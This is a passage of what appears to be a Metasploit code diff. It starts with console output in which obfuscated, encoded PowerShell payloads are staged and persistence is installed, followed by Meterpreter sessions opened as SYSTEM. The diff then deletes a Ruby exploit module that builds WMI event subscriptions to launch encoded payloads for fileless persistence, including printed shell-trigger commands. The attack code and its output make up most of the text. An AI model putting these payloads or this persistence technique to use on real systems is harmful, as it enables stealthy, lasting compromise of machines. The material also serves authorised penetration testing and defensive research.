)  -InputFormat None +[+] - Bytes remaining: 6260 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I A F m 8 I W ' + ' k C A 4 W Y T 3 P a W h L F v 8 r s M l P 1 F v 6 b 8 X t V s 2 g F A Q 4 W R A Z { 2 } x N Q s M D { 2 } 6 D r Z J 7 M R y / O n n / M 4 V z t s N G 5 W E d G / 3 6 d O n u + + / 8 4 f n 2 8 f 9 w / 3 2 4 f t / / v h j u v 3 + l w f z 1 e P t 6 u Z u + / d 3 R / q d j D 4 2 2 S o + f 3 j 3 2 7 t N m f 0 z e p f x 3 z { 1 } O o l / ' + ' G d R P n M X i { ' + ' 1 } c Z n l k T d R R D a P Y R 3 X Z X Y a / V 1 c t X q v t 4 5 x Z L M Y 5 L F s s p P o r + N j G 4 / x Y R 2 L y O 5 j 0 M S y z H 6 y 7 g 3 / 9 4 q o v O 5 R F E 1 2 F Y M z n n + N Q a H 9 s l 0 M y l g 1 2 Q / W W 7 D v c { 2 } / z M l 5 j W M S m ' + ' i T b 6 + 5 h w 3 6 u i i u w 1 8 k r P s 4 + R 7 0 L 2 T y J v Y 9 v G z x g e x T T i L A a X r N d j n 1 V k i + j l f F ' + ' d j / 6 j N { 1 } t a 9 j u x 9 D C 5 i j t 3 9 y 9 i y / z C X f 9 m I + 3 H D e v i t 9 Y Z l 3 L D O o I 6 y l d 8 f L n S v 5 x + e Y h P y Q + + N G 9 k x D P Y 5 j c E e / H 5 E r 5 Y 9 w k H r z r x u i X / P 4 L e N r I 3 h O p a R 3 c V Q O L M P f k U 8 8 3 3 d Z P s Y 7 m L R y E 7 Z r z h c d v E 4 J j 7 z V r j l { 2 } X j X + { 1 } F 1 d 9 E L 7 J I / F f 7 d E 5 c b 8 A S H l n U v + P 4 O f 6 o m u 8 X + s p S f u q 5 L / C i w + y 4 G O 5 4 / Y 9 c G H P W / v j 8 D Z 6 2 7 5 7 p s s y f 7 1 2 p 9 7 T v x 9 + u Y E u d + ' + ' E f P I { 2 } t F v w P v Z 6 z a { 1 } n / w S X 1 r w W j f Z n + C h f V 9 Z X 3 i U 8 G H p 9 y 5 4 r w A n x e + R f Y q I E / 9 f y h 7 x o W 6 z P u v I n x H f F 6 W u 4 l s V 8 i c / i + t W d m p / r f 8 t + h G r k v X M 1 1 ' + ' v 4 p ' + ' T i e w L s Z c d { 1 } 9 c J 4 T 9 4 n t L u H 5 C 9 / N I 4 7 t f 2 R T + C f / T r l u z U f z o g Y v 8 e Y z u E 4 b x U n r C v c p 9 m k 9 7 y v / P s W w E q 9 l t 9 Z 3 3 g g 3 f X c { 1 } P 8 S T W + 5 n z p M q i l Y 4 w R N 4 2 d v { 2 } h x a / R r y f + H N M / G t 4 I 7 / r N h 6 w 8 2 O r f c U T 8 f A b O M q O E + x V n j ' + ' i / b x r 5 I x 7 L j k / c F 8 7 X i r x 5 J P 9 q + N I j X g ' + ' d d U J z y I 3 A 9 ' + ' I d / k 3 z 1 8 2 r J O f k E 8 x t z L n 2 f W G b V h f 5 Q 3 5 + C n u L + w n u J R R r 5 O + S G e y 4 5 H r u M 2 M + + l J y v s c h 5 L R 0 b 4 o 3 y W b j z D 9 w n r k W c l + r H T + 8 J f 6 8 u / z 9 F r i { 1 } f y u c X P Y 3 h Y O Y 8 { 1 } 8 P r J e 7 o / 4 H P L P t { 1 } d o x i a N 7 9 H v g f P G X z R e v f E T 7 x / I r 6 { 1 } 8 6 n f a / S e 1 r 2 C V / C ' + ' w z Y b 4 v 8 C P w V p 5 o a v + X 4 N 3 / p T 8 0 X 4 L 8 x E + Z d + d v 8 5 n 8 T 7 g M b o j v / S + c M 3 Q r T X 2 8 x 0 4 a z 3 l + Q / 8 n c H f A y 7 C u Q Q 3 / b 9 y n g Z + f M S P S S S e T M C n Z z x f w P G m J X + k y y F / 8 N d 2 r P l u 2 v F p j n 1 r 4 7 3 D z h N w G q N 7 5 { 2 } F 5 I 7 9 r 9 F j 6 N 0 U 3 5 M c Y H m n d G 5 4 r z l f o k v 7 f l t k L v L k p t a / i o + c P 7 D O C { 2 } 7 0 y 6 Z L s 1 v d f 0 { 2 } P x 8 C X p ' + ' M v y 3 7 l S 2 j 6 v 4 t A E n 5 Y 9 0 1 L z y P u R x { 1 } d y 1 3 q j T A + n T M z y 4 Q t d l / 9 r 7 N e j R L d 9 t / ' + ' H 7 { 2 } u p f J D 3 C u q U d H 1 i H s k r 6 s y Q v x c u t 8 z 9 H 5 g j x U X a m 7 f ' + ' D E + c 3 { 2 } 6 4 2 s { 2 } f q f 4 p X W / J 5 7 p P e W Z 8 u 2 ' + ' c e I 3 N 0 4 r n Z 8 7 P ' + ' { 2 } n 2 7 R D + T D g X 1 V d + T R 4 r f { 2 } L 0 b W E e G 9 q c k 7 6 x j r 8 R j T C W H r + j z w P m x x I 8 5 + e 8 8 0 H v k D X U v 6 U d p / Q n x L e F Q k V + { 1 } x y X 7 z e G N + L g k b 4 f m 4 x X 4 V a 4 r D T p Y u P 6 R d w c c e t Y r 4 1 P A h 5 7 z p O T + 6 l A v W / R A + D l P D n l H f q n e y N 9 r 8 k g 4 L 7 { 2 } L f t z Q j + j / G p 1 V H G b w p M 9 + 4 L r D / n v 0 d o 6 O i z + b S H j P y Q ' + ' P Z V Z P 3 w k F x c J 3 b E j f F Z 9 Z Q Z 3 { 1 } + H / D e G P u G 7 l s u o 0 9 d A n 9 f H / F / Q / 1 R ' + ' X g j / 3 H U y 0 M U c X f z { 1 } e z P q e b + L m 3 h a t { 1 } l ' + ' P U V y G + L 0 h T w 7 + { 1 } k 5 a 5 0 / 7 H d { 1 } X / C L p p r 6 T v a 7 v M 3 C i n s H n 3 H l z R h 1 3 P 5 D q m P ' + ' X 6 0 G / N 4 b O + n 8 A L 2 a G 4 u { 2 } / Y Y ' + ' M / A 9 X E C T w p w o o 7 Z f + 0 T u k 9 1 + Y R 9 r j t 7 D 3 o x R Q c U d + t S z / 3 A u e N o 3 a j h w T 2 4 i 2 8 P 8 C j p z Z o 4 v ' + ' n D d l G m / j f W o x e 8 R / Y ' + ' z 7 A { 1 } 0 3 p 2 4 d 8 k Y 6 I R w + g 3 + F D u S 1 6 o r 4 3 / f / Z 9 S X M f 3 L 0 P r x 1 M V l i T 1 r 8 u D w 3 P m h + H 9 w n 7 M E 7 7 H 5 4 z x 4 I m 7 y 8 4 v r e J { 2 } v { 2 } T q 7 A 1 f x 4 r S r m 1 1 8 U 9 4 v X ' + ' E e k T + S 1 c F / i { 2 } + s Q L 6 0 j f b k n n 8 b U Q + s L 8 W 2 x 6 z 1 x W V H P k g 4 9 g F v C r 0 r 6 o P 5 q x f 2 b r l 8 S 3 w V 4 3 n j d S + J / D l 8 2 6 I R 4 O y ' + ' G e 8 D r Q z T 3 2 ' + ' p v 6 s R H 9 L 9 j X v h c e X 1 J d i 9 x l 4 v h J 3 1 x / d r 9 E H 4 t h S h 9 y P P { 1 } A D S / o d 6 d e m V d 7 L n x p d H ' + ' J i P 7 m v E 2 4 9 v f N b 3 o z b 1 L S v X s Q a / v q W + k v W D 6 0 / 8 U b 3 6 h P 6 U 6 M z A f e O 9 9 c 9 x c L 4 / E i f Z ' + ' c Q w / q k j z g / V a c Z J ' + ' O u L 7 e U J d d z + W H r l P 0 S L o p n O p O F 5 6 6 P v n e u t + m f l A 6 8 Q 1 8 R 8 S h b 1 6 c E ' + ' U / h u Y N P Y + q X 4 q U 6 1 v U J 5 P O e O H x 3 n W j E y 7 7 t + t r 1 o V / x y 3 O I c J / x v 3 C d 0 Q + r T s m P T / g / 7 v x b O { 1 } 7 6 v k 3 5 s M H / l H ' + ' + n 2 H d F 3 p O v 8 J F + p k w 6 k H R 8 n 3 g g / d N 1 k f p r + n H 3 P S V 2 e L 6 Q n Z X 1 q + x w L M h z 6 8 W y T H 3 6 y n q 3 h y f H r F M 7 T s b r G V y E x x g 7 l u 5 r L t C x R + y b u o 9 x P 3 N m n W / h y S X 2 5 e S 1 1 j H f h Y 9 5 v { 1 } X P T X 3 z L ' + ' f 2 R 7 F m + 8 f L A d + 0 r / b 1 z 3 + R 6 0 7 D + o + s s u i e + 1 d T { 2 } v u e L L 6 x z 0 L 0 a n v e Y M 6 l L 5 u X J W 5 8 m 3 m w j 9 c 3 W O 9 X L u k n 1 S v e 5 ' + ' + 3 r j X q Q + 0 T q j v { 2 } 3 Y v r t O { 2 } 4 7 h t + L 7 j X W u P d 8 1 f G d d X M A D 6 f e G v k j v b 9 1 P g n O q 9 0 v X c c + T { 1 } / O I O S r p Y E V 8 V v T j W n f i f n H d 1 X t 9 3 / 6 F f 8 w D 5 j / r w 0 f 3 C b X 7 T v h { 2 } X S a f c / R I d k k 3 Z / R F q V 9 4 S n V U f m F X p H 5 i C R 6 ' + ' 6 r 7 E T X j u O 7 i d f r J c d n y b E b + h 8 q d 0 n d P 3 k 1 P N G n u r + 0 H 3 7 9 C 2 u f e v P M 3 y v r d M 1 8 6 j 7 0 w X 9 g v a 7 b t M c J F 6 c W 0 9 + + e u 6 M 0 a H 3 / q D { 2 } j u + d f P L j r y b u / 9 q y f u S f { 1 } v p o 9 S X X H f 9 x d j 6 v k v 1 I p 0 T P I { 2 } X 0 s M d 3 7 k u V f A o n W u s + F 4 4 n v 3 a 1 3 G 6 4 r 3 l m x 5 k r m / C 5 1 A f X s m f a / i g 6 9 L z U 0 H d P b b O t u o v y O 9 I c Z 3 b n i f 4 c J i r 3 { 1 } / V 7 u 8 q d G b v f g r e v / V b z E n M o 4 E f { 2 } b y p y z T X X 9 P 3 9 Y z z a 2 e v + 5 o R f Z j e v 6 b + U W d / 7 d c 3 / u Q n c 4 7 n 9 m 6 O y q 0 r c 9 5 L + d 2 g T 1 8 ' + ' 6 H f M 5 h + a d x z T 3 w q c a / j o e ' + ' s 6 D e X 6 b + n / M C 5 n n r G f P E 0 d u 5 z M r 4 7 l j v j r o m / r T Y a 7 1 M P C 7 ' + ' A Y 9 H N i 0 v w S v P x F / Y 3 z s w z 5 D X n H 8 w 9 6 h e u f A 6 { 2 } v d R p n / e c k A d r + g z Z O f N 5 U 0 u ' + ' + 7 s G t a { 2 } O u s + 6 c Y s X z n u t L b R 4 w p y s O W 3 g r 3 l S 2 w 7 r 2 A 5 x X 7 n c L c L 8 n r 8 e u 4 3 v q w w g d q 7 G T c w D q 0 x C + w o u S f U 6 7 / u k r d r p P 8 j y e n X R 9 3 4 F n P 9 x v l M w 9 1 u u { 1 } c 5 O i 0 6 1 r z m 9 k X 4 V e y V 7 3 f 7 { 1 } z a { 2 } P v J 6 6 b a / T 8 y e d s k f r x J f 3 t 0 P p X O V 8 a 6 b ' + ' z P 5 e j v 3 I f f g + e I c w y f y y Q d V t 2 Y 8 9 3 a / L P f 5 / h b w F P 5 U 5 N 3 n E + U C f + C O t T z f P / i O m ' + ' I d a b p 5 o { 1 } { 1 } P c l 2 x n f R F H c / N o 7 7 z / U / O C b d N 4 l n { 2 } H N 2 r 0 n m M c P W c 1 D c / P 8 I v z w 1 D 8 + D F 9 Y R 5 N c X l w H u f d 0 3 o l 5 h X X T 8 u 4 M M X d P e G c 7 5 0 n u d z p n m Z e F w S 3 w / O V 5 / T T e A D / s { 1 } b p E d j r r X j s 3 u r S w V + D u { 2 } d 0 m 3 r d 9 / n g 1 P 3 0 c w H 1 O l O j 8 d l m j u v O p 5 t m 6 S z S V c u 8 e c h z V c 8 t 3 + H 8 9 o T 8 4 O + k z r V U r e t H 8 s 0 X 9 J n 7 v D z j n i u u n l 3 w z m S n q 8 j n W + t y M O + 5 y / X r y l 4 0 G 9 7 3 m Q O T / Z 6 r i S e 7 i d 2 8 P W R / n M c C c 9 D n h / y b f 3 r v O W k O 5 c 5 S u c S x N f n { 2 } A X n S Q u f M + z S v O X 6 Q 1 9 2 R F 7 8 7 H i X / + o X H H + f 7 8 z e d C 3 F b e 0 5 Z I c u 3 X b 9 / 3 v + P 8 R l T J 1 I / l + x / i Z S 3 p S e m 5 x / / l 9 5 e 0 Y d M U 9 z 6 j c 6 Q l / x 5 s / v x G U T 6 R z E e a 3 3 1 N d m f i 8 4 J + q u 2 F 2 G 5 1 L Z 4 f s r c O n n 3 D 9 x X 3 r d H e 9 9 5 X o V 2 Q 2 6 t E V H x d s l + v L h j L 7 6 E 9 e S 8 1 T Z v 3 b + e P 5 4 { 2 } b 8 b d O P / / ' + ' c 9 5 j P u D { 1 } j 6 X I X z 2 n Z 4 U q c 8 V n 9 b o M + c Y b b J H d v 3 A 3 6 X ' + ' z s q T f e 0 7 n d 5 z z N G 9 2 L 9 2 f U V e i w a + Z z 1 V y + D { 2 } C 5 0 v X H ' + ' + V R G / 9 6 9 9 v f 3 l V P 2 8 d 3 / / g f f z r g v b U Y A A A { 0 } ' ) - f ' = ' , ' K ' , ' B ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAbQA4AEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBTAEUALwA0AHEASABEAFoAWABTAFUAMwBRAHcATwBxAFIAWQBWAEkAJwArACcAYwBPAFoAZwBRAFMAcwBlAHAARABOAHYAVgB0ADcAQwA1AGkAWgB2ACsAOQBsAFEAbwA2ADkAawA3AEQAbQArAEcAYgBTAFUASgBzAG0ATwBCAFkAQQA2AHEAewAwAH0ANQA2ADEAQgAvAFQAeQBPAFYARABDAGEAVgBpAEEAdABNADUAWQBnAFQATgBzAHQANABTADcANwBDAEMAcgBJAGwAQgBNAHAAdwBiAEEAdwBkAHQAdgBDAHAAOAB0AFQAMABFAGQAYwBLAEcAZQBmAFgAcgBYAFgAewAxAH0AeAA2AGsAeQA4AGUATAA1AEIAKwA2AFIAUwA2AFQARAAvADgANQAzADIAJwArACcARABEAFMAMwBEAEMAOQBpAFoAQQAnACsAJwBTAHMAYgBSAEkAQgBhAHgAawBnAE8AMAB5AGcAMAB4ADQANwBtAHUAMQBLAFEAWQBtAGQAYgBnAGEAdQBKADcAeABoAEEASwBPAEQAWQBnAGgAcQBLAFYANABMAFYAUABKAGMAeQBtAFgANwBmAEwANwBlAEYAZQBFAGQAUABKAEYAKwA4AEEAQQBBAEEAewAyAH0AJwApAC0AZgAnAHoAJwAsACcAagAnACwAJwA9ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAbQA4AEkAVwBrAEMAQQA0ADIATwBRAFEAdQBDAFEAQgBTAEUALwA0AHEASABEAFoAWABTAFUAMwBRAHcATwBxAFIAWQBWAEkAJwArACcAYwBPAFoAZwBRAFMAcwBlAHAARABOAHYAVgB0ADcAQwA1AGkAWgB2ACsAOQBsAFEAbwA2ADkAawA3AEQAbQArAEcAYgBTAFUASgBzAG0ATwBCAFkAQQA2AHEAewAwAH0ANQA2ADEAQgAvAFQAeQBPAFYARABDAGEAVgBpAEEAdABNADUAWQBnAFQATgBzAHQANABTADcANwBDAEMAcgBJAGwAQgBNAHAAdwBiAEEAdwBkAHQAdgBDAHAAOAB0AFQAMABFAGQAYwBLAEcAZQBmAFgAcgBYAFgAewAxAH0AeAA2AGsAeQA4AGUATAA1AEIAKwA2AFIAUwA2AFQARAAvADgANQAzADIAJwArACcARABEAFMAMwBEAEMAOQBpAFoAQQAnACsAJwBTAHMAYgBSAEkAQgBhAHgAawBnAE8AMAB5AGcAMAB4ADQANwBtAHUAMQBLAFEAWQBtAGQAYgBnAGEAdQBKADcAeABoAEEASwBPAEQAWQBnAGgAcQBLAFYANABMAFYAUABKAGMAeQBtAFgANwBmAEwANwBlAEYAZQBFAGQAUABKAEYAKwA4AEEAQQBBAEEAewAyAH0AJwApAC0AZgAnAHoAJwAsACcAagAnACwAJwA9ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 5896 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAMgA4ACcAKwAnAEkAVwBrAEMAQQA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAewAwAH0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAcwB4AEwAVgAvAEQAMgBTAG4AZABLAGQASQB4AHcAcgAnACsAJwBsAEcAdABqAGsAWQAxAEwAQgBpAHIAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUAewAxAH0AVABwAFEAUQAyAHMAQgBDAEUAdgBLAFgANABRAEEAQQBBAEEAPQAnACkALQBmACcAbQAnACwAJwBPACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBNAGYAcQBOAEoAYQBBAEUAJwA7AA== -InputFormat None +[+] Persistence installed! +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251122.3630/WIN10PROLICENSE_20251122.3630.rc +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49706) at 2025-11-22 08:39:07 -0500 +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49707) at 2025-11-22 08:40:06 -0500 +msf exploit(windows/persistence/wmi/wmi_event_subscription_uptime) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb deleted file mode 100644 index da45657a5ca85..0000000000000 --- a/modules/exploits/windows/local/wmi_persistence.rb +++ /dev/null @@ -1,230 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Local - Rank = NormalRanking - - include Msf::Post::Windows::Powershell - include Msf::Exploit::Powershell - include Post::Windows::Priv - include Msf::Post::File - - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'WMI Event Subscription Persistence', - 'Description' => %q{ - This module will create a permanent WMI event subscription to achieve file-less persistence using one - of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER - (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing - must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon - /failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload. - The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON - method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS - method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method - creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER - before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command - (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is - activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a - high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations. - }, - 'Author' => ['Nick Tyrer <@NickTyrer>'], - 'License' => MSF_LICENSE, - 'Privileged' => true, - 'Platform' => 'win', - 'SessionTypes' => ['meterpreter'], - 'Targets' => [['Windows', {}]], - 'DisclosureDate' => '2017-06-06', - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'DisablePayloadHandler' => true - }, - 'References' => [ - ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'], - ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/'] - ], - 'Notes' => { - 'Reliability' => UNKNOWN_RELIABILITY, - 'Stability' => UNKNOWN_STABILITY, - 'SideEffects' => UNKNOWN_SIDE_EFFECTS - } - ) - ) - - register_options([ - OptEnum.new('PERSISTENCE_METHOD', - [true, 'Method to trigger the payload.', 'EVENT', ['EVENT', 'INTERVAL', 'LOGON', 'PROCESS', 'WAITFOR']]), - OptInt.new('EVENT_ID_TRIGGER', - [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]), - OptString.new('USERNAME_TRIGGER', - [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]), - OptString.new('PROCESS_TRIGGER', - [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]), - OptString.new('WAITFOR_TRIGGER', - [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]), - OptInt.new('CALLBACK_INTERVAL', - [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]), - OptString.new('CLASSNAME', - [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ]) - ]) - - register_advanced_options( - [ - OptString.new('CUSTOM_PS_COMMAND', - [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be encolsed in quotes)', false, ]), - ] - ) - end - - def exploit - unless have_powershell? - print_error("This module requires powershell to run") - return - end - - unless is_admin? - print_error("This module requires admin privs to run") - return - end - - unless is_high_integrity? - print_error("This module requires UAC to be bypassed first") - return - end - - if is_system? - print_error("This module cannot run as System") - return - end - - host = session.session_host - print_status('Installing Persistence...') - - case datastore['PERSISTENCE_METHOD'] - when 'LOGON' - psh_exec(subscription_logon) - print_good "Persistence installed!" - remove_persistence - when 'INTERVAL' - psh_exec(subscription_interval) - print_good "Persistence installed!" - remove_persistence - when 'EVENT' - psh_exec(subscription_event) - print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\#{host}\\\\C$ -U " + datastore['USERNAME_TRIGGER'] + " \"" - remove_persistence - when 'PROCESS' - psh_exec(subscription_process) - print_good "Persistence installed!" - remove_persistence - when 'WAITFOR' - psh_exec(subscription_waitfor) - print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI " + datastore['WAITFOR_TRIGGER'] + "\"" - remove_persistence - end - end - - def build_payload - if datastore['CUSTOM_PS_COMMAND'] - script_in = datastore['CUSTOM_PS_COMMAND'] - compressed_script = compress_script(script_in, eof = nil) - encoded_script = encode_script(compressed_script, eof = nil) - generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script) - else - cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) - end - end - - def subscription_logon - command = build_payload - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_interval - command = build_payload - class_name = datastore['CLASSNAME'] - callback_interval = datastore['CALLBACK_INTERVAL'] - <<-HEREDOC - $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \"Trigger\"} - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_event - command = build_payload - event_id = datastore['EVENT_ID_TRIGGER'] - username = datastore['USERNAME_TRIGGER'] - class_name = datastore['CLASSNAME'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"#{class_name}\"; CommandLineTemplate = \"#{command}\"} - $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer} - HEREDOC - end - - def subscription_process - command = build_payload - class_name = datastore['CLASSNAME'] - process_name = datastore['PROCESS_TRIGGER'] - <<-HEREDOC - $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"#{class_name}\"; Query = \"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\"; QueryLanguage = 'WQL'} - $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = 